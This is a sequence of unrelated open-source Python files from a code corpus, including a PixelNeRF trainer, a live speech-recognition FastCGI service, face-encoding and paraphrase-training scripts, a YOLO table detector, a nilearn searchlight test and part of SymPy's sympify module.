plt.ylim(df_cruise.iloc[0].lon - 5, df_cruise.iloc[0].lon + 5)
plt.title("(%s)" % pieces)
pieces += 1
# fig2.suptitle("spatial relevance analysis for flight - %s" % df_cruise.callsign.iloc[0])
# fig2.savefig('%s-density.eps' % (df_cruise.callsign.iloc[0]), format='eps')
# loop control
# limit the amount of flights
loop -= 1
if loop <= 0:
break
plt.show()
|
the-stack_0_19805 | # Training to a set of multiple objects (e.g. ShapeNet or DTU)
# tensorboard logs available in logs/<expname>
import sys
import os
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "src"))
)
import warnings
import trainlib
from model import make_model, loss
from render import NeRFRenderer
from data import get_split_dataset
import util
import numpy as np
import torch.nn.functional as F
import torch
from dotmap import DotMap
def extra_args(parser):
parser.add_argument(
"--batch_size", "-B", type=int, default=4, help="Object batch size ('SB')"
)
parser.add_argument(
"--nviews",
"-V",
type=str,
default="1",
help="Number of source views (multiview); put multiple (space delim) to pick randomly per batch ('NV')",
)
parser.add_argument(
"--category",
type=str,
default="plant",
help="CO3D Dataset class",
)
parser.add_argument(
"--freeze_enc",
action="store_true",
default=None,
help="Freeze encoder weights and only train MLP",
)
parser.add_argument(
"--no_bbox_step",
type=int,
default=100000,
help="Step to stop using bbox sampling",
)
parser.add_argument(
"--fixed_test",
action="store_true",
default=None,
help="Freeze encoder weights and only train MLP",
)
return parser
args, conf = util.args.parse_args(extra_args, training=True, default_ray_batch_size=128)
device = util.get_cuda(args.gpu_id[0])
if args.dataset_format == "co3d":
dset, val_dset, _ = get_split_dataset(args.dataset_format, args.datadir, category=args.category)
else:
dset, val_dset, _ = get_split_dataset(args.dataset_format, args.datadir)
print(
"dset z_near {}, z_far {}, lindisp {}".format(dset.z_near, dset.z_far, dset.lindisp)
)
asdas = dset[0]
net = make_model(conf["model"]).to(device=device)
net.stop_encoder_grad = args.freeze_enc
if args.freeze_enc:
print("Encoder frozen")
net.encoder.eval()
renderer = NeRFRenderer.from_conf(conf["renderer"], lindisp=dset.lindisp,).to(
device=device
)
# Parallize
render_par = renderer.bind_parallel(net, args.gpu_id).eval()
nviews = list(map(int, args.nviews.split()))
class PixelNeRFTrainer(trainlib.Trainer):
def __init__(self):
super().__init__(net, dset, val_dset, args, conf["train"], device=device)
self.renderer_state_path = "%s/%s/_renderer" % (
self.args.checkpoints_path,
self.args.name,
)
self.lambda_coarse = conf.get_float("loss.lambda_coarse")
self.lambda_fine = conf.get_float("loss.lambda_fine", 1.0)
print(
"lambda coarse {} and fine {}".format(self.lambda_coarse, self.lambda_fine)
)
self.rgb_coarse_crit = loss.get_rgb_loss(conf["loss.rgb"], True)
fine_loss_conf = conf["loss.rgb"]
if "rgb_fine" in conf["loss"]:
print("using fine loss")
fine_loss_conf = conf["loss.rgb_fine"]
self.rgb_fine_crit = loss.get_rgb_loss(fine_loss_conf, False)
if args.resume:
if os.path.exists(self.renderer_state_path):
renderer.load_state_dict(
torch.load(self.renderer_state_path, map_location=device)
)
self.z_near = dset.z_near
self.z_far = dset.z_far
self.use_bbox = args.no_bbox_step > 0
def post_batch(self, epoch, batch):
renderer.sched_step(args.batch_size)
def extra_save_state(self):
torch.save(renderer.state_dict(), self.renderer_state_path)
def calc_losses(self, data, is_train=True, global_step=0):
if "images" not in data:
return {}
all_images = data["images"].to(device=device) # (SB, NV, 3, H, W)
SB, NV, _, H, W = all_images.shape
all_poses = data["poses"].to(device=device) # (SB, NV, 4, 4)
all_bboxes = data.get("bbox") # (SB, NV, 4) cmin rmin cmax rmax
all_focals = data["focal"] # (SB)
all_c = data.get("c") # (SB)
if self.use_bbox and global_step >= args.no_bbox_step:
self.use_bbox = False
print(">>> Stopped using bbox sampling @ iter", global_step)
if not is_train or not self.use_bbox:
all_bboxes = None
all_rgb_gt = []
all_rays = []
curr_nviews = nviews[torch.randint(0, len(nviews), ()).item()]
if curr_nviews == 1:
image_ord = torch.randint(0, NV, (SB, 1))
else:
image_ord = torch.empty((SB, curr_nviews), dtype=torch.long)
for obj_idx in range(SB):
if all_bboxes is not None:
bboxes = all_bboxes[obj_idx]
images = all_images[obj_idx] # (NV, 3, H, W)
poses = all_poses[obj_idx] # (NV, 4, 4)
focal = all_focals[obj_idx]
c = None
if "c" in data:
c = data["c"][obj_idx]
if curr_nviews > 1:
# Somewhat inefficient, don't know better way
image_ord[obj_idx] = torch.from_numpy(
np.random.choice(NV, curr_nviews, replace=False)
)
images_0to1 = images * 0.5 + 0.5
cam_rays = util.gen_rays(
poses, W, H, focal, self.z_near, self.z_far, c=c
) # (NV, H, W, 8)
rgb_gt_all = images_0to1
rgb_gt_all = (
rgb_gt_all.permute(0, 2, 3, 1).contiguous().reshape(-1, 3)
) # (NV, H, W, 3)
if all_bboxes is not None:
pix = util.bbox_sample(bboxes, args.ray_batch_size)
pix_inds = pix[..., 0] * H * W + pix[..., 1] * W + pix[..., 2]
else:
pix_inds = torch.randint(0, NV * H * W, (args.ray_batch_size,))
rgb_gt = rgb_gt_all[pix_inds] # (ray_batch_size, 3)
rays = cam_rays.view(-1, cam_rays.shape[-1])[pix_inds].to(
device=device
) # (ray_batch_size, 8)
all_rgb_gt.append(rgb_gt)
all_rays.append(rays)
all_rgb_gt = torch.stack(all_rgb_gt) # (SB, ray_batch_size, 3)
all_rays = torch.stack(all_rays) # (SB, ray_batch_size, 8)
image_ord = image_ord.to(device)
src_images = util.batched_index_select_nd(
all_images, image_ord
) # (SB, NS, 3, H, W)
src_poses = util.batched_index_select_nd(all_poses, image_ord) # (SB, NS, 4, 4)
all_bboxes = all_poses = all_images = None
net.encode(
src_images,
src_poses,
all_focals.to(device=device),
c=all_c.to(device=device) if all_c is not None else None,
)
render_dict = DotMap(render_par(all_rays, want_weights=True,))
coarse = render_dict.coarse
fine = render_dict.fine
using_fine = len(fine) > 0
loss_dict = {}
rgb_loss = self.rgb_coarse_crit(coarse.rgb, all_rgb_gt)
loss_dict["rc"] = rgb_loss.item() * self.lambda_coarse
if using_fine:
fine_loss = self.rgb_fine_crit(fine.rgb, all_rgb_gt)
rgb_loss = rgb_loss * self.lambda_coarse + fine_loss * self.lambda_fine
loss_dict["rf"] = fine_loss.item() * self.lambda_fine
loss = rgb_loss
if is_train:
loss.backward()
loss_dict["t"] = loss.item()
return loss_dict
def train_step(self, data, global_step):
return self.calc_losses(data, is_train=True, global_step=global_step)
def eval_step(self, data, global_step):
renderer.eval()
losses = self.calc_losses(data, is_train=False, global_step=global_step)
renderer.train()
return losses
def vis_step(self, data, global_step, idx=None):
if "images" not in data:
return {}
if idx is None:
batch_idx = np.random.randint(0, data["images"].shape[0])
else:
print(idx)
batch_idx = idx
images = data["images"][batch_idx].to(device=device) # (NV, 3, H, W)
poses = data["poses"][batch_idx].to(device=device) # (NV, 4, 4)
focal = data["focal"][batch_idx : batch_idx + 1] # (1)
c = data.get("c")
if c is not None:
c = c[batch_idx : batch_idx + 1] # (1)
NV, _, H, W = images.shape
cam_rays = util.gen_rays(
poses, W, H, focal, self.z_near, self.z_far, c=c
) # (NV, H, W, 8)
images_0to1 = images * 0.5 + 0.5 # (NV, 3, H, W)
curr_nviews = nviews[torch.randint(0, len(nviews), (1,)).item()]
views_src = np.sort(np.random.choice(NV, curr_nviews, replace=False))
view_dest = np.random.randint(0, NV - curr_nviews)
for vs in range(curr_nviews):
view_dest += view_dest >= views_src[vs]
views_src = torch.from_numpy(views_src)
# set renderer net to eval mode
renderer.eval()
source_views = (
images_0to1[views_src]
.permute(0, 2, 3, 1)
.cpu()
.numpy()
.reshape(-1, H, W, 3)
)
gt = images_0to1[view_dest].permute(1, 2, 0).cpu().numpy().reshape(H, W, 3)
with torch.no_grad():
test_rays = cam_rays[view_dest] # (H, W, 8)
test_images = images[views_src] # (NS, 3, H, W)
net.encode(
test_images.unsqueeze(0),
poses[views_src].unsqueeze(0),
focal.to(device=device),
c=c.to(device=device) if c is not None else None,
)
test_rays = test_rays.reshape(1, H * W, -1)
render_dict = DotMap(render_par(test_rays, want_weights=True))
coarse = render_dict.coarse
fine = render_dict.fine
using_fine = len(fine) > 0
alpha_coarse_np = coarse.weights[0].sum(dim=-1).cpu().numpy().reshape(H, W)
rgb_coarse_np = coarse.rgb[0].cpu().numpy().reshape(H, W, 3)
depth_coarse_np = coarse.depth[0].cpu().numpy().reshape(H, W)
if using_fine:
alpha_fine_np = fine.weights[0].sum(dim=1).cpu().numpy().reshape(H, W)
depth_fine_np = fine.depth[0].cpu().numpy().reshape(H, W)
rgb_fine_np = fine.rgb[0].cpu().numpy().reshape(H, W, 3)
print("c rgb min {} max {}".format(rgb_coarse_np.min(), rgb_coarse_np.max()))
print(
"c alpha min {}, max {}".format(
alpha_coarse_np.min(), alpha_coarse_np.max()
)
)
alpha_coarse_cmap = util.cmap(alpha_coarse_np) / 255
depth_coarse_cmap = util.cmap(depth_coarse_np) / 255
vis_list = [
*source_views,
gt,
depth_coarse_cmap,
rgb_coarse_np,
alpha_coarse_cmap,
]
vis_coarse = np.hstack(vis_list)
vis = vis_coarse
if using_fine:
print("f rgb min {} max {}".format(rgb_fine_np.min(), rgb_fine_np.max()))
print(
"f alpha min {}, max {}".format(
alpha_fine_np.min(), alpha_fine_np.max()
)
)
depth_fine_cmap = util.cmap(depth_fine_np) / 255
alpha_fine_cmap = util.cmap(alpha_fine_np) / 255
vis_list = [
*source_views,
gt,
depth_fine_cmap,
rgb_fine_np,
alpha_fine_cmap,
]
vis_fine = np.hstack(vis_list)
vis = np.vstack((vis_coarse, vis_fine))
rgb_psnr = rgb_fine_np
else:
rgb_psnr = rgb_coarse_np
psnr = util.psnr(rgb_psnr, gt)
vals = {"psnr": psnr}
print("psnr", psnr)
# set the renderer network back to train mode
renderer.train()
return vis, vals
trainer = PixelNeRFTrainer()
trainer.start()
|
the-stack_0_19808 | #!/usr/bin/python3
# Copyright (C) 2020 Intel Corporation
from html import escape
from urllib.parse import parse_qs
from flup.server.fcgi import WSGIServer
import subprocess
import json
import base64
import os
import time
import sys
import wave
import datetime
import numpy as np
import ctypes
import inferservice_python as rt_api
import socket
import grpc
import struct
import service_runtime_health_monitor_pb2
import service_runtime_health_monitor_pb2_grpc
import threading, queue
from threading import Lock,Thread,Event
import logging
import logging.handlers
import syslog as syslogger
TARGET_CHANNELS = [0] #[0, 1]
TARGET_SAMPLE_RATE = 16000
FRAMES_PER_BUFFER = int(80000) #(TARGET_SAMPLE_RATE / 10)
INT16_INFO = np.iinfo(np.int16)
syslog = logging.handlers.SysLogHandler(address=('localhost', 514), facility='user', socktype=socket.SOCK_DGRAM)
msgfmt = '%(asctime)s {0} %(name)s[%(process)d]: %(message)s'.format(socket.gethostname())
formatter = logging.Formatter(msgfmt, datefmt='%b %d %H:%M:%S')
syslog.setFormatter(formatter)
logger = logging.getLogger(os.path.basename(sys.argv[0]))
logger.addHandler(syslog)
logger.setLevel(logging.DEBUG)
L = []
stop = Event()
q = queue.Queue()
gAsrInit = Event()
gInitStatus = 0
def get_default_gateway():
with open("/proc/net/route") as proc_route:
for line in proc_route:
items = line.strip().split()
if items[1] != '00000000' or not int(items[3], 16) & 2:
continue
return socket.inet_ntoa(struct.pack("<L", int(items[2], 16)))
return None
def scale_volume(np_data):
volume = 1 # by default volume is at 100%
np_data *= volume * INT16_INFO.max # scale from float [-1, 1] to int16 range
if volume != 1:
np.clip(np_data, INT16_INFO.min, INT16_INFO.max, np_data)
return np_data
def asr_thread():
global gInitStatus
try:
import soundcard
except Exception as err:
gInitStatus = 1
gAsrInit.set()
exit(0)
speech = np.zeros((10,), dtype = np.short)
sampwidth = 2
model_xml = './models/lspeech_s5_ext/FP32/speech_lib.cfg'
buf = np.zeros((100 * 100), dtype = np.int8)
utt_res = rt_api.vectorChar(buf)
device = 'CPU'
default_mic = soundcard.default_microphone()
syslogger.syslog("def mic is: %s" %(default_mic.name))
mode = 1
res = rt_api.live_asr(mode, speech, int(sampwidth), model_xml, device, utt_res)
gAsrInit.set()
with default_mic.recorder(TARGET_SAMPLE_RATE, channels=TARGET_CHANNELS, blocksize=512) as mic:
while not stop.is_set():
mic_data = mic.record(FRAMES_PER_BUFFER)
mic_data = scale_volume(mic_data)
for j in range(100*100):
utt_res[j] = '\u0000'
mode = 2
res = rt_api.live_asr(mode, mic_data, int(sampwidth), model_xml, device, utt_res)
utt_str = ''.join(utt_res)
q.put(utt_str.split('\u0000')[0])
#syslogger.syslog("output utt is: %s" %(utt_str.split('\u0000')[0]))
mode = 0
for j in range(100*100):
utt_res[j] = '\u0000'
res = rt_api.live_asr(mode, speech, int(sampwidth), model_xml, device, utt_res)
def get_result(environ):
start_time = time.time()
try:
request_body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
request_body_size = 0
data = environ["wsgi.input"].read(request_body_size)
d = dict((k, v[0]) for k, v in parse_qs(data).items())
healthcheck = d.get(b'healthcheck')
if healthcheck and int(healthcheck) == 1:
healthcheck_str = "healthcheck ok"
return healthcheck_str
s_mode = d.get(b'mode')
res = 0
if int(s_mode) == 0:
syslogger.syslog('AI-Service-Framework: start sthread')
if os.environ.get("PULSE_SERVER") == None:
mointor_server_addr = get_default_gateway()
if mointor_server_addr == None:
res = 2
else:
try:
os.environ["no_proxy"] = mointor_server_addr + ",localhost"
with grpc.insecure_channel(mointor_server_addr + ':8082') as channel:
stub = service_runtime_health_monitor_pb2_grpc.MonitorStub(channel)
resp = stub.get_pulse_server_addr(service_runtime_health_monitor_pb2.Empty())
if resp.status != 0:
res = 2;
else:
os.environ["PULSE_SERVER"] = resp.addr
except Exception as e:
res = 2
if (res == 0):
global gInitStatus
gInitStatus = 0
gAsrInit.clear()
stop.clear()
p = Thread(target=asr_thread, daemon=True)
p.start()
gAsrInit.wait()
if gInitStatus != 0:
p.join()
res = 2
utt = 'Starting live asr failure!'
else:
L.append(p)
utt = 'Starting live asr ok!'
if int(s_mode) == 1:
utt = q.get()
syslogger.syslog("fcgi get is: %s" %(utt))
if int(s_mode) == 2:
stop.set()
if len(L) > 0:
p = L[0]
p.join()
L.remove(p)
utt = 'Stop live asr ok!'
if res == 0:
logger.info('AI-Service-Framework: local inference')
ie_dict = {}
ie_dict["text"] = utt
result_dict = {}
result_dict["ret"] = 0
result_dict["msg"] = "ok"
result_dict["data"] = ie_dict
server_running_time = round(time.time() - start_time, 3)
result_dict["time"] = server_running_time
result_json = json.dumps(result_dict, indent = 1)
elif res == 1:
logger.info('AI-Service-Framework: remote inference')
result_text = ("{" + urlinfo.response.split("{", 1)[1])
result_dict = json.loads(result_text)
server_running_time = round(time.time() - start_time, 3)
result_dict['time'] = server_running_time
result_json = json.dumps(result_dict, indent = 1)
result_json = str(result_json).encode('utf-8').decode('unicode_escape').encode('utf-8')
else:
syslogger.syslog('AI-Service-Framework: inference error')
result_dict = {}
result_dict["ret"] = 1
if res == 2:
result_dict["msg"] = "The pulse server ip is error, try again after os fully bootup!"
else:
result_dict["msg"] = "inference failed"
result_json = json.dumps(result_dict, indent = 1)
logger.info('AI-Service-Framework: can not get inference results')
return result_json
def application(environ, start_response):
result = get_result(environ)
body = result
status = '200 OK'
headers = [('Content-Type', 'text/plain')]
start_response(status, headers)
return [body]
if __name__ == '__main__':
WSGIServer(application).run()
|
the-stack_0_19809 | # USAGE
# When encoding on laptop, desktop, or GPU (slower, more accurate):
# python encode_faces.py --dataset dataset --encodings encodings.pickle --detection-method cnn
# When encoding on Raspberry Pi (faster, more accurate):
# python encode_faces.py --dataset dataset --encodings encodings.pickle --detection-method hog
# import the necessary packages
from imutils import paths
import face_recognition
import argparse
import pickle
import cv2
import os
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--dataset", required=True,
help="path to input directory of faces + images")
ap.add_argument("-e", "--encodings", required=True,
help="path to serialized db of facial encodings")
ap.add_argument("-d", "--detection-method", type=str, default="cnn",
help="face detection model to use: either `hog` or `cnn`")
args = vars(ap.parse_args())
# grab the paths to the input images in our dataset
print("[INFO] quantifying faces...")
imagePaths = list(paths.list_images(args["dataset"]))
# initialize the list of known encodings and known names
knownEncodings = []
knownNames = []
# loop over the image paths
for (i, imagePath) in enumerate(imagePaths):
# extract the person name from the image path
print("[INFO] processing image {}/{}".format(i + 1,
len(imagePaths)))
name = imagePath.split(os.path.sep)[-2]
# load the input image and convert it from RGB (OpenCV ordering)
# to dlib ordering (RGB)
image = cv2.imread(imagePath)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input image
boxes = face_recognition.face_locations(rgb,
model=args["detection_method"])
# compute the facial embedding for the face
encodings = face_recognition.face_encodings(rgb, boxes)
# loop over the encodings
for encoding in encodings:
# add each encoding + name to our set of known names and
# encodings
knownEncodings.append(encoding)
knownNames.append(name)
# dump the facial encodings + names to disk
print("[INFO] serializing encodings...")
data = {"encodings": knownEncodings, "names": knownNames}
f = open(args["encodings"], "wb")
f.write(pickle.dumps(data))
f.close() |
the-stack_0_19812 | import os
from datetime import datetime
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
from simpletransformers.seq2seq import Seq2SeqModel, Seq2SeqArgs
from utils import load_data, clean_unnecessary_spaces
logging.basicConfig(level=logging.INFO)
transformers_logger = logging.getLogger("transformers")
transformers_logger.setLevel(logging.ERROR)
# Google Data
train_df = pd.read_csv("data/train.tsv", sep="\t").astype(str)
eval_df = pd.read_csv("data/dev.tsv", sep="\t").astype(str)
train_df = train_df.loc[train_df["label"] == "1"]
eval_df = eval_df.loc[eval_df["label"] == "1"]
train_df = train_df.rename(
columns={"sentence1": "input_text", "sentence2": "target_text"}
)
eval_df = eval_df.rename(
columns={"sentence1": "input_text", "sentence2": "target_text"}
)
train_df = train_df[["input_text", "target_text"]]
eval_df = eval_df[["input_text", "target_text"]]
train_df["prefix"] = "paraphrase"
eval_df["prefix"] = "paraphrase"
# MSRP Data
train_df = pd.concat(
[
train_df,
load_data("data/msr_paraphrase_train.txt", "#1 String", "#2 String", "Quality"),
]
)
eval_df = pd.concat(
[
eval_df,
load_data("data/msr_paraphrase_test.txt", "#1 String", "#2 String", "Quality"),
]
)
# Quora Data
# The Quora Dataset is not separated into train/test, so we do it manually the first time.
df = load_data(
"data/quora_duplicate_questions.tsv", "question1", "question2", "is_duplicate"
)
q_train, q_test = train_test_split(df)
q_train.to_csv("data/quora_train.tsv", sep="\t")
q_test.to_csv("data/quora_test.tsv", sep="\t")
# The code block above only needs to be run once.
# After that, the two lines below are sufficient to load the Quora dataset.
# q_train = pd.read_csv("data/quora_train.tsv", sep="\t")
# q_test = pd.read_csv("data/quora_test.tsv", sep="\t")
train_df = pd.concat([train_df, q_train])
eval_df = pd.concat([eval_df, q_test])
train_df = train_df[["prefix", "input_text", "target_text"]]
eval_df = eval_df[["prefix", "input_text", "target_text"]]
train_df = train_df.dropna()
eval_df = eval_df.dropna()
train_df["input_text"] = train_df["input_text"].apply(clean_unnecessary_spaces)
train_df["target_text"] = train_df["target_text"].apply(clean_unnecessary_spaces)
eval_df["input_text"] = eval_df["input_text"].apply(clean_unnecessary_spaces)
eval_df["target_text"] = eval_df["target_text"].apply(clean_unnecessary_spaces)
print(train_df)
model_args = Seq2SeqArgs()
model_args.eval_batch_size = 64
model_args.evaluate_during_training = True
model_args.evaluate_during_training_steps = 2500
model_args.evaluate_during_training_verbose = True
model_args.fp16 = False
model_args.learning_rate = 5e-5
model_args.max_seq_length = 128
model_args.num_train_epochs = 2
model_args.overwrite_output_dir = True
model_args.reprocess_input_data = True
model_args.save_eval_checkpoints = False
model_args.save_steps = -1
model_args.train_batch_size = 8
model_args.use_multiprocessing = False
model_args.do_sample = True
model_args.num_beams = None
model_args.num_return_sequences = 3
model_args.max_length = 128
model_args.top_k = 50
model_args.top_p = 0.95
model_args.wandb_project = "Paraphrasing with BART"
model = Seq2SeqModel(
encoder_decoder_type="bart",
encoder_decoder_name="facebook/bart-large",
args=model_args,
)
model.train_model(train_df, eval_data=eval_df)
to_predict = [
prefix + ": " + str(input_text)
for prefix, input_text in zip(eval_df["prefix"].tolist(), eval_df["input_text"].tolist())
]
truth = eval_df["target_text"].tolist()
preds = model.predict(to_predict)
# Saving the predictions if needed
os.makedirs("predictions", exist_ok=True)
with open(f"predictions/predictions_{datetime.now()}.txt", "w") as f:
for i, text in enumerate(eval_df["input_text"].tolist()):
f.write(str(text) + "\n\n")
f.write("Truth:\n")
f.write(truth[i] + "\n\n")
f.write("Prediction:\n")
for pred in preds[i]:
f.write(str(pred) + "\n")
f.write(
"________________________________________________________________________________\n"
)
|
the-stack_0_19813 | import math
class Stats:
@staticmethod
def get_recomendations(reviews):
recomendation = {'polecam': 0, 'nie_polecam': 0}
for review in reviews:
if review['recomendation'] == 'Polecam':
recomendation['polecam'] += 1
else:
recomendation['nie_polecam'] += 1
return recomendation
@staticmethod
def get_ratings(reviews):
score = {'0,5': 1 , '1': 0, '1,5': 0, '2': 0, '2,5': 0, '3': 0, '3,5': 0, '4': 0, '4,5': 0, '5': 0}
for review in reviews:
rating = review['score'].split('/')[0]
score[rating] += 1
return score
@staticmethod
def calculate_stats(reviews):
stats = {}
stats['number_of_opinions'] = len(reviews)
number_of_props = 0
number_of_cons = 0
sum_of_ratings = 0
for review in reviews:
number_of_props += review['props']
number_of_cons += review['cons']
sum_of_ratings += float(review['score'].split('/')[0].replace(',', '.'))
stats['number_of_props'] = number_of_props
stats['number_of_cons'] = number_of_cons
stats['mean_rating'] = round(sum_of_ratings / len(reviews), 2)
return stats
|
the-stack_0_19814 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 9 23:11:51 2020
table detect with yolo
@author: chineseocr
"""
import cv2
import numpy as np
from config import tableModelDetectPath
from utils import nms_box, letterbox_image, rectangle
tableDetectNet = cv2.dnn.readNetFromDarknet(tableModelDetectPath.replace('.weights', '.cfg'), tableModelDetectPath) #
def table_detect(img, sc=(416, 416), thresh=0.5, NMSthresh=0.3):
"""
表格检测
img:GBR
"""
scale = sc[0]
img_height, img_width = img.shape[:2]
inputBlob, fx, fy = letterbox_image(img[..., ::-1], (scale, scale))
inputBlob = cv2.dnn.blobFromImage(inputBlob, scalefactor=1.0, size=(scale, scale), swapRB=True, crop=False);
tableDetectNet.setInput(inputBlob / 255.0)
outputName = tableDetectNet.getUnconnectedOutLayersNames()
outputs = tableDetectNet.forward(outputName)
class_ids = []
confidences = []
boxes = []
for output in outputs:
for detection in output:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > thresh:
center_x = int(detection[0] * scale / fx)
center_y = int(detection[1] * scale / fy)
width = int(detection[2] * scale / fx)
height = int(detection[3] * scale / fy)
left = int(center_x - width / 2)
top = int(center_y - height / 2)
if class_id == 1:
class_ids.append(class_id)
confidences.append(float(confidence))
xmin, ymin, xmax, ymax = left, top, left + width, top + height
xmin = max(xmin, 1)
ymin = max(ymin, 1)
xmax = min(xmax, img_width - 1)
ymax = min(ymax, img_height - 1)
boxes.append([xmin, ymin, xmax, ymax])
boxes = np.array(boxes)
confidences = np.array(confidences)
if len(boxes) > 0:
boxes, confidences = nms_box(boxes, confidences, score_threshold=thresh, nms_threshold=NMSthresh)
boxes, adBoxes = fix_table_box_for_table_line(boxes, confidences, img)
return boxes, adBoxes, confidences
def point_in_box(p, box):
x, y = p
xmin, ymin, xmax, ymax = box
if xmin <= x <= xmin and ymin <= y <= ymax:
return True
else:
return False
def fix_table_box_for_table_line(boxes, confidences, img):
### 修正表格用于表格线检测
h, w = img.shape[:2]
n = len(boxes)
adBoxes = []
for i in range(n):
prob = confidences[i]
xmin, ymin, xmax, ymax = boxes[i]
padx = (xmax - xmin) * (1 - prob)
padx = padx
pady = (ymax - ymin) * (1 - prob)
pady = pady
xminNew = max(xmin - padx, 1)
yminNew = max(ymin - pady, 1)
xmaxNew = min(xmax + padx, w)
ymaxNew = min(ymax + pady, h)
adBoxes.append([xminNew, yminNew, xmaxNew, ymaxNew])
return boxes, adBoxes
if __name__ == '__main__':
import time
import argparse
parser = argparse.ArgumentParser(description='tabel to excel demo')
parser.add_argument('--tableSize', default='416,416', type=str, help="表格检测输入size")
parser.add_argument('--jpgPath', default='img/table-detect.jpg', type=str, help="测试图像地址")
args = parser.parse_args()
args.tableSize = [int(x) for x in args.tableSize.split(',')]
p = 'img/table-detect.jpg'
img = cv2.imread(args.jpgPath)
t = time.time()
boxes, adBoxes, scores = table_detect(img, sc=(416, 416), thresh=0.5, NMSthresh=0.3)
print(time.time() - t, boxes, adBoxes, scores)
img = rectangle(img, adBoxes)
img.save('img/table-detect.png')
|
the-stack_0_19816 | """
Test the searchlight module
"""
# Author: Alexandre Abraham
# License: simplified BSD
import numpy as np
import nibabel
from nilearn.decoding import searchlight
def test_searchlight():
# Create a toy dataset to run searchlight on
# Initialize with 4x4x4 scans of random values on 30 frames
rand = np.random.RandomState(0)
frames = 30
data = rand.rand(5, 5, 5, frames)
mask = np.ones((5, 5, 5), dtype=bool)
mask_img = nibabel.Nifti1Image(mask.astype(int), np.eye(4))
# Create a condition array, with balanced classes
cond = np.arange(frames, dtype=int) >= (frames // 2)
# Create an activation pixel.
data[2, 2, 2, :] = 0
data[2, 2, 2][cond.astype(bool)] = 2
data_img = nibabel.Nifti1Image(data, np.eye(4))
# Define cross validation
from sklearn.model_selection import KFold
cv = KFold(n_splits=4)
n_jobs = 1
# Run Searchlight with different radii
# Small radius : only one pixel is selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img,
radius=0.5, n_jobs=n_jobs,
scoring='accuracy', cv=cv, verbose=1)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 1
assert sl.scores_[2, 2, 2] == 1.
# The voxel selected in process_mask_img is too far from the signal
process_mask = np.zeros((5, 5, 5), dtype=bool)
process_mask[0, 0, 0] = True
process_mask_img = nibabel.Nifti1Image(process_mask.astype(int),
np.eye(4))
sl = searchlight.SearchLight(mask_img, process_mask_img=process_mask_img,
radius=0.5, n_jobs=n_jobs,
scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 0
# Medium radius : little ball selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
assert sl.scores_[1, 2, 2] == 1.
assert sl.scores_[2, 1, 2] == 1.
assert sl.scores_[2, 2, 1] == 1.
assert sl.scores_[3, 2, 2] == 1.
assert sl.scores_[2, 3, 2] == 1.
assert sl.scores_[2, 2, 3] == 1.
# Big radius : big ball selected
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=2,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond)
assert np.where(sl.scores_ == 1)[0].size == 33
assert sl.scores_[2, 2, 2] == 1.
# group cross validation
try:
from sklearn.model_selection import LeaveOneGroupOut
gcv = LeaveOneGroupOut()
except ImportError:
# won't import model selection if it's not there.
# the groups variable should have no effect.
gcv = cv
groups = np.random.RandomState(42).permutation(
np.arange(frames, dtype=int) > (frames // 2)
)
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=gcv)
sl.fit(data_img, cond, groups)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
# adding superfluous group variable
sl = searchlight.SearchLight(mask_img, process_mask_img=mask_img, radius=1,
n_jobs=n_jobs, scoring='accuracy', cv=cv)
sl.fit(data_img, cond, groups)
assert np.where(sl.scores_ == 1)[0].size == 7
assert sl.scores_[2, 2, 2] == 1.
# Check whether searchlight works on list of 3D images
rand = np.random.RandomState(0)
data = rand.rand(5, 5, 5)
data_img = nibabel.Nifti1Image(data, affine=np.eye(4))
imgs = [data_img] * 12
# labels
y = [0, 1] * 6
# run searchlight on list of 3D images
sl = searchlight.SearchLight(mask_img)
sl.fit(imgs, y)
|
the-stack_0_19817 | """sympify -- convert objects SymPy internal format"""
from __future__ import print_function, division
from inspect import getmro
from .core import all_classes as sympy_classes
from .compatibility import iterable, string_types
class SympifyError(ValueError):
def __init__(self, expr, base_exc=None):
self.expr = expr
self.base_exc = base_exc
def __str__(self):
if self.base_exc is None:
return "SympifyError: %r" % (self.expr,)
return ("Sympify of expression '%s' failed, because of exception being "
"raised:\n%s: %s" % (self.expr, self.base_exc.__class__.__name__,
str(self.base_exc)))
converter = {} # See sympify docstring.
class CantSympify(object):
"""
Mix in this trait to a class to disallow sympification of its instances.
Example
=======
>>> from sympy.core.sympify import sympify, CantSympify
>>> class Something(dict):
... pass
...
>>> sympify(Something())
{}
>>> class Something(dict, CantSympify):
... pass
...
>>> sympify(Something())
Traceback (most recent call last):
...
SympifyError: SympifyError: {}
"""
pass
def sympify(a, locals=None, convert_xor=True, strict=False, rational=False, evaluate=True):
"""Converts an arbitrary expression to a type that can be used inside SymPy.
For example, it will convert Python ints into instance of sympy.Rational,
floats into instances of sympy.Float, etc. It is also able to coerce symbolic
expressions which inherit from Basic. This can be useful in cooperation
with SAGE.
It currently accepts as arguments:
- any object defined in sympy
- standard numeric python types: int, long, float, Decimal
- strings (like "0.09" or "2e-19")
- booleans, including ``None`` (will leave ``None`` unchanged)
- lists, sets or tuples containing any of the above
If the argument is already a type that SymPy understands, it will do
nothing but return that value. This can be used at the beginning of a
function to ensure you are working with the correct type.
>>> from sympy import sympify
>>> sympify(2).is_integer
True
>>> sympify(2).is_real
True
>>> sympify(2.0).is_real
True
>>> sympify("2.0").is_real
True
>>> sympify("2e-45").is_real
True
